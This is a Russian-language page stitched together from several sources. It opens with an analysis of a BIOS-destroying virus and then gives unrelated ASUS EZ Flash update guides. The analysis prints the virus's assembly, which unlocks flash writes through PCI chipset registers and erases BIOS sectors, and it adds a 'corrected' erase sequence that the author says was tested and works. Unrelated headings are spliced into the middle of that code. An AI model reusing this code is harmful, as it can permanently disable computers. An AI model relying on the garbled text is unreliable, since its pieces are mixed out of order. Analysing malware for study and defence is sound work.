Bios flash что это за программа
Вообще данные для устройства на шине PCI пишутся и читаются через порт 0CFCh, который является 32 битным портом. Поэтому инструкция out dx, eax , развернется в четыре команды:
; out dx ,al ;dx=0CFCh
; out dx+1,ah ;dx=0CFDh
; out dx+2, младший байт старшего слова ;dx=0CFEh (!)
; out dx+3, старший байт старшего слова ;dx=0CFFh
Для возможности записи в флэш необходимо будет изменить значение только одного байта, который будет считан и записан в порт 0СFEh. Поэтому, для уменьшения собственного размера, вирус работает только с этим портом, читая один байт вместо двойного слова. Значение регистра edi разберем позднее.
Cli ; запрещает прерывания
call esi ; call IOForEEPROM
я включу код процедуры IOForEEPROM прямо здесь на наглядности:
(IOForEEPROM:
xchg eax, edi ; eax=8000384ch, edi=? , данные
xchg edx, ebp ; edx=0cf8h,ebp=0cfeh; , регистр
out dx, eax ; записываем
xchg eax, edi ; edi=8000384ch , eax=?
xchg edx, ebp ; edx=0cfeh; ,регистр
in al, dx ; получаем тек. значение
BooleanCalculateCode = $ ;
or al, 44h ; устанавливем ROM enable, eax=value1=800038**h or 44h
xchg eax, edi ; eax=8000384ch, edi=value1, данные
xchg edx, ebp ; edx=0cf8h, ebp==0cfch; , регистр
out dx, eax ; записываем
xchg eax, edi ; eax=value1 ,edi=8000384ch , данные
xchg edx, ebp ; edx=0cfch, ebp=0cf8h , регистр
out dx, al ; записываем
MSI Flash BIOS. Обновление BIOS без процессора.
Итак, что делает данная процедура? Во-первых, edi=8000384Сh, есть ни что иное
как индекс регистра устройства на шине PCI (в данном случае это какой-нибудь PCI bridge чипсета материнской платы) На wasm.ru есть статья Dark_Mastera “Определение конфигурации компьютера”, где подробно показано, как формируется индекс PCI устройства. Здесь же могу сказать что
8000384ch=10000000000000000011100001001100b получаем номер регистра устройства=4Сh, номер самого устройства= 7, номер функции =0 (основная), шина=0. Вирус записал в порт 0CF8h, 8000384Сh считал из порта 0CFEh текущий статус разрешения доступа к флэш. Далее установил значение в «enable» (al, 44h) и перепрограммировал чипсет. Пока добавлю, что данный метод открытия доступа к флэш характерен для чипсетов 430VX, HX,TX и некоторых других фирмы Intel. Более подробно мы разберем методы программирования различных чипсетов во второй части статьи.
; Прочитать страницу BIOS
; 000F0000 — 000FFFFF
mov di, 0058h ; edi=80000058h
dec edx ; edx=0cfdh
;опкод команды and al,0fh
call esi ; call IOForEEPROM
Здесь, похоже, вирус исполняет код, разрешающий доступ к флэш для других чипов. (Для каких именно не могу сказать, нигде не нашел регистр 58h, девайса 0).
Кроме того, вирус изменяет код процедуры IOForEEPROM, вставляя в нее команду and al,0fh вместо or al, 44h. Видоизмененный код IOForEEPROM преведен внизу:
(IOForEEPROM:
xchg eax, edi ; eax=80000058h, edi=value1, данные
xchg edx, ebp ; edx=0cf8h,ebp=0cfbh ; регистр
out dx, eax ; записываем out 0cfbh,80000058h
xchg eax, edi ; edi=80000058h,eax=value1 ; данные
xchg edx, ebp ; edx=0cfbh;ebp=0cf8h , регистр
in al, dx ; получаем тек. значение
(BooleanCalculateCode :
and al, 0fh ; измененная команда
xchg eax, edi ; eax=80000058h, edi=value2 , данные
xchg edx, ebp ; edx=0cf8h, ebp=0cfbh; , регистр
out dx , eax ; записываем
xchg eax, edi ; eax=value2, edi=80000058h, данные
xchg edx, ebp ; edx=0cfbh, ebp=0cf8h , регистр
out dx, al ; записываем
; Прочитать дополнительные данные BIOS
; 000E0000 — 000E01FF
; и секция дополнительного BIOS (Extra BIOS)
; может быть записана.
; EnableEEPROMToWrite
mov eax, 0e5555h ; команда для Flash
mov ecx, 0e2aaah ; команда для Flash
call ebx ; call EnableEEPROMToWrite
Что такое БИОС/UEFI? Нужно ли ОБНОВЛЯТЬ и как ПРОШИТЬ?
Вот и самое главное: после установки разрешения доступа к флэш, режим записи (в данном случае команда очистки сектора флэш) происходит следующим образом:
(я снова вставил код вызываемой процедуры для наглядности)
(EnableEEPROMToWrite:
mov [eax], cl ; mov[0E5555h], 0AAh
mov [ecx], al ; mov[0E2aaah], 55h
mov byte ptr [eax], 80h ; mov[0E5555h], 80h
; команда Erase sector
mov [eax], cl ; mov[0E5555h], 0AAh
mov [ecx], al ; mov[0E2aaah], 55h
mov byte ptr [eax], 60h ; mov[0E5555h], 60h
; команда Confirm erase (30h,50h )
Последовательность этих шести команд в адресное пространство сектора флэш (сектор начинается с 0E0000h) приводит к заполнению сектора нулями. mov[0E5555h], 0AAh и
mov[0E2AAAh], 55h – идентификатор команды, mov[0E5555h], 80h – собственно команда “erase setup”. (В данном случае считается, что установлена секторная флэш микросхема). Аналогичны последующие 3 команды подтверждающие очистку флэш.
Причем команда mov[0E5555h], 60h (60h) мне не встречалась в технической документации, а если вместо 60h поставить 30h или 50h то флэши наподобие Intel 28F010/12V’ и многие другие будут стерты. Здесь и возникает сомнительный момент. Вирус атакует сектор, начало которого расположено по адресу 0Е0000h. Но, как я уже говорил, флэш картируется (отображается) на верхние адреса 4Gb пространства). Поэтому правильно код должен выглядеть так:
; mov byte ptr [0FFFE5555h] ,0AAh
; mov byte ptr [0FFFE2AAAh] , 55h
; mov byte ptr [0FFFE5555h] , 80h ; команда Erase sector
; mov byte ptr [0FFFE5555h] ,0AAh
; mov byte ptr [0FFFE2AAAh] , 55h
; mov byte ptr [0FFFE5555h] , 50h ; команда Confirm Erase
Работоспособность этого кода проверена. Однако, из-за недостатка информации, можно предположить, что флэш-память картируется и на верхние адреса первого мегабайта. В принципе, это было бы логично, поскольку, начиная работу в реальном режиме и при стандартно установленных базах и лимитах сегментых регистров, процессор не может получить доступ к памяти выше одного мегабайта. Проверить Михаила Гука нет возможности, а проверить картирование флэш памяти на верхние адреса первого мегабайта можно, чем мы и займемся во второй части статьи.
push ecx ; push 0e2aaah
; ожидаем окончания
; переходных процессов
; Прибить дополнительные данные BIOS (BIOS Extra ROM Data)
; 000E0000 — 000E007F
xor ah, ah ; ah=0
mov [eax], al ; mov mov[0e0055h],55h ; вот собственно и запись
Здесь вирус еще и пишет в стертый сектор, для надежности, пожалуй. По большому счету эта команда лишняя.
xchg ecx, eax ; снова тормозим
; Показать и включить основные данные BIOS
; 000E0000 — 000FFFFF, (128 KB), может быть записана.
mov eax, 0f5555h ; адрес
pop ecx ; ecx=0E2AAAh
mov ch, 0aah ; ecx=0EAAAAh
call ebx ; call EnableEEPROMToWrite
(EnableEEPROMToWrite:
mov [eax], cl ; mov[0F5555h] ,0AAh
mov [ecx], al ; mov[0EAAAAh], 55h
; тут по-видимому ошибка в коде
; должно быть 0FAAAAh
mov byte ptr [eax], 80h ; mov[0F5555h], 80h
; erase sector
mov [eax], cl ; mov[0E5555h], 0aah
mov [ecx], al ; mov[0EAAAAh], 55h
; тут по-видимому ошибка в коде
;должно быть 0FAAAAh
mov byte ptr [eax], 60h ; mov[0E5555h], 60h
; (30h или 50h надо бы) confirm erase
Здесь делается попытка записать сектор 0F000h, но либо в коде допущена ошибка, либо изменили исходник. В любом случае вирус уже сделал свое дело — сектор 0E0000h уже пустой…
push ecx ; push 0EAAAAh
loop $ ; ожидаем окончания
; переходных процессов
mov byte ptr [eax], 20h ; mov[0e5555h],20h
; подтверждаем очистку
Вирус посылает команду 20h, подтверждающую очистку сектора характерную для некоторых модулей флэш
loop $ ; ожидаем окончания
; переходных процессов
; Прибить данные об основном BIOS
; 000FE000 — 000FE07F, (80h Bytes)
mov ah, 0e0h ; eax=0EE055h
mov [eax], al ; mov [0EE055h], 55h
; и еще пишем для надежности
Еще пишет для надежности, но в свете предыдущего кода эта попытка неудачна.
; Спрятать страницу BIOS
; 000F0000 — 000FFFFF,(64 KB)
Источник: wasm.in
Скачать BIOS Flash Utility
Средство ASUS EZ Flash 3 Utility представляет собой программное обеспечение, встроенное в БИОС устройств от ASUS и предназначенное для обновления микропрограммы.
Открытие утилиты
Поскольку рассматриваемое средство не является программой для Windows, запустить его можно только из-под BIOS. Открыть утилиту можно на специальной вкладке – в большинстве случаев это «Advanced» – «EZ Flash Utility». Так эта вкладка выглядит в современном UEFI.
А так – в текстовом варианте прошивки.
Использование утилиты
Рассматриваемое средство само по себе бесполезно: потребуется носитель с записанным на него файлом прошивки для BIOS. В качестве внешнего носителя в большинстве случаев используется USB Flash, в качестве внутреннего – основной накопитель компьютера. Утилита позволяет выбирать как один, так и другой варианты.
Программа сканирует файловую систему на наличие прошивки и отображает её в примитивном подобии «Проводника». Отсюда же запускается процедура апдейта микропрограммы: достаточно выбрать требуемый файл, нажать Enter и подтвердить своё желание.
Достоинства
- Лёгкость в освоении;
- Наличие защиты от прошивки неподходящей версии.
Недостатки
- Присутствует только в устройствах ASUS;
- Доступ осуществляется исключительно через BIOS.
ASUS EZ Flash 3 Utility – невероятно простое средство, которое значительно облегчает процесс обновления прошивки БИОС, если в этой процедуре возникла необходимость. Для использования этого средства не понадобится никаких особых знаний или навыков.
Скачать BIOS Flash Utility бесплатно
Скачать приложение BIOS Flash Utility бесплатно вы можете ->>> ЗДЕСЬ
Источник: upgrade-android.ru
Как обновить UEFI (BIOS) ноутбука (на примере ASUS). Прошивка с помощью EZ Flash Utility
Доброго времени!
Сегодня на повестке довольно узкая тема (// обновление BIOS/UEFI), и касается это только пользователей ноутбуков Asus (хотя, сам процесс на др. устройствах идет аналогично).
Вообще, данную операцию (в основном) приходится проводить относительно редко (если и приходится — то обычно не более 1-2 раз за все время использования устройством). Например, когда производитель в новой версии исправил какие-то серьезные ошибки или добавил новые функции.
На сегодняшний день есть 2 способа , как произвести обновление (прошивку) UEFI/BIOS: 1. через спец. утилиту прямо из-под Windows (удобный вариант, но не всегда доступен); 2. с помощью заранее подготовленной USB-флешки (с которой нам вручную нужно будет указать файл-прошивку в UEFI/BIOS).
Ниже рассмотрю оба варианта чуть подробнее.
Примечание:
- имейте ввиду, что процедура обновления UEFI (BIOS) иногда может закончиться походом в ремонтную мастерскую (например, некоторые пользователи ошибаются и загружают не те версии прошивок. ). Поэтому, обновлять его нужно только по необходимости!
- далеко не всегда самая новая прошивка — самая стабильная!
- самостоятельная прошивка устройства может стать причиной отказа в гарантийном обслуживании (см. условия гарантии).
Прошивка / обновление UEFI: что делать по шагам
Способ 1
Если у вас на ноутбуке предустановлено «родное» ПО — то в утилите MyASUS (проверьте меню ПУСК) есть спец. раздел «Поддержка клиентов / Обновления Live. » (см. скрин ниже).
С ее помощью можно быстро найти последние версии программ, драйверов и BIOS.
Далеко не все устройства поддерживают утилиту MyASUS (если у вас оной нет — перейдите ко второму варианту, см. ниже).
Стоит отметить, что процесс обновления BIOS (UEFI) я бы все же рекомендовал выполнять с загрузочной флешки (на мой взгляд это безопаснее // По крайней мере создайте такую флешку, записав на нее несколько версий прошивок, чтобы в случае чего — вы могли ей воспользоваться!).
MyAsus — устройство обновлено!
Способ 2
ШАГ 1
Сначала необходимо определить модель своего ноутбука. Сделать это можно разными способами.
Вариант 1: запустить командную строку, ввести systeminfo и нажать Enter.
Далее среди большого списка свойств и характеристик найти строку «Модель системы» (собственно, нам нужна лишь аббревиатура вида «TP420UA», см. пример ниже ).
CMD — модель системы
Вариант 2: если у вас предустановлено все «заводское» ПО от Asus — найдите в меню ПУСК утилиту «MyASUS» и запустите ее. Далее откройте в ней вкладку «Информация о системе» — там должна присутствовать модель устройства.
Приложение MyASUS — информация о системе
Вариант 3: можно просто посмотреть документы, которые шли вместе с ноутбуком. Также см. в помощь одну мою старую заметку по этой теме.
ШАГ 2
Далее нужно перейти на офиц. сайт Asus и ввести модель в строку поиска (ссылку на центр загрузок я привел, куда вводить аббревиатуру тоже — см. скриншот ниже ).
Поиск на сайте Asus (скрин с офиц. сайта)
После перед вами должен появиться список прошивок UEFI (BIOS) — загрузите самые новые из них (рекомендую загружать сразу несколько версий, если оные будут)!
Важно: не загружайте прошивки не для своего устройства! Если перепрошить неподходящей прошивкой — ноутбук после может не включиться. (само собой без мастерской уже будет не обойтись. ).
Смотрим дату и загружаем
Важный момент : как правило, прошивка требуется более новая, чем у вас установлена на устройстве. Чтобы узнать текущую версию прошивки на устройстве — попробуйте в командной строке набрать wmic bios get SMBIOSBIOSVersion (см. пример ниже).
Если войти в UEFI (BIOS) — в меню тоже можно узнать их версию.
wmic bios get SMBIOSBIOSVersion
ШАГ 3
Затем нужно извлечь файл прошивки из архива и записать на обычную USB-флешку. ( В помощь : как распаковать архив RAR, 7Z, ZIP и др. архивы)
Копируем файл прошивки на флешку
ШАГ 4
Следующий момент : нужно проверить насколько заряжена батарея ноутбука (процедуру желательно проводить при зарядке не менее 30% и подключенном кабелем питания).
Прим. : дело в том, что на некоторых устройствах есть ограничение, которое не позволит обновить BIOS, если батарея разряжена!
Собственно, далее:
- отключаем от ноутбука всё, кроме адаптера питания и «нашей подготовленной» флешки;
- выключаем/перезагружаем устройство;
- заходим в UEFI (BIOS): на ноутбуках Asus для этого достаточно зажать кнопку Esc перед включением устройства . Также см. инструкцию, ссылку на которую привожу чуть ниже.
В помощь!
Как зайти в BIOS (UEFI) на ноутбуке ASUS — [см. инструкцию]
ШАГ 5
В UEFI (BIOS) нужно открыть расширенный режим — Advanced Mode (клавиша F7).
После перейти во вкладку «Advanced» и запустить утилиту «ASUS EZ Flash 3 Utility» .
EZ Flash Utility — режим Advanced Mode
Утилита отобразит все подключенные съемные диски: нужно открыть нашу подготовленную флешку, указать на ней файл-прошивки и нажать Enter. Далее утилита попросит подтвердить операцию.
Важно: при непосредственно процессе обновления BIOS — рекомендую абсолютно ничего не делать с ноутбуком: не подключать к нему никаких устройств, не нажимать клавиш, не отключать питание и т.д.
Если вы правильно выбрали прошивку и «не мешали» устройству — то через 3-4 мин. процесс будет завершён, ноутбук перезагрузится и будет готов к работе!
Выбираем прошивку с флешки и подтверждаем операцию прошивки
Дополнения по теме — будут весьма кстати (комментарии открыты!)
Источник: ocomp.info
Для чего нужен пункт меню “Asus EZ Flash 3 Utility” в BIOS?
Открыв параметры BIOS практически любой современной материнской платы или ноутбука фирмы Asus в расширенном режиме (Advanced Mode), на вкладке Tool можно обратить внимание на пункт меню с названием Asus EZ Flash 3 Utility. Что это такое и для чего он нужен вы узнаете в данной статье.
Как обновить BIOS на материнской плате Asus?
Для максимального упрощения данной процедуры разработчики компании Asus подошли к решению этого вопроса очень досконально. Ведь даже спустя несколько лет после выпуска той или иной модели материнской платы продолжается ее поддержка. Выражается она в выпуске более новых версий BIOS, которые призваны убрать найденные ошибки и добавить поддержку большего количества модулей памяти и процессоров.
Asus EZ Flash 3 Utility это встроенная в BIOS фирменная утилита, которая всего за несколько нажатий клавиш позволит вам обновить версию BIOS на вашей материнской плате или ноутбуке. У других производителей существуют свои подобные утилиты.
Как обновить BIOS через Asus EZ Flash 3 Utility?
Существует два варианта обновления: через usb флешку и через интернет.
Выбор варианта обновления
Для обновления через флешку вам придется отформатировать ее в файловую систему FAT16/32, скачать последнюю версию BIOS с официального сайта поддержки Asus под вашу материнскую плату и скопировать файл BIOS в корень флешки.
Далее вставляете флешку в компьютер, заходите в BIOS на вкладку “Tool” и выбираете Asus EZ Flash 3 Utility.
Затем вам будет предложено выбрать вариант обновления: через флешку или через интернет.
Выбор осуществляется клавишей TAB.
Выбор файла обновления BIOS на флешке
После этого кнопками Up/Down находите на флешке файл с прошивкой и кнопкой Enter запускаете процесс.
Ни в коем случае не выключайте и не перезагружайте компьютер во время обновления прошивки.
По окончании процесса прошивки перезагрузите ПК.
При прошивке через интернет на компьютере должно быть активное интернет соединение.
Начало процесса обновления
Вам нужно следовать инструкциям матера обновления. По окончании данного процесса также перезагружаете ПК.
Вывод
Asus EZ Flash 3 Utility в настройках BIOS является ярлыком запуска встроенной утилиты обновления версии BIOS. С ее помощью можно всего несколькими нажатиями клавиш на клавиатуре установить последнее обновление BIOS для вашей материнской платы или ноутбука фирмы Asus.
Лучшая благодарность автору — репост к себе на страничку:
Источник: helpadmins.ru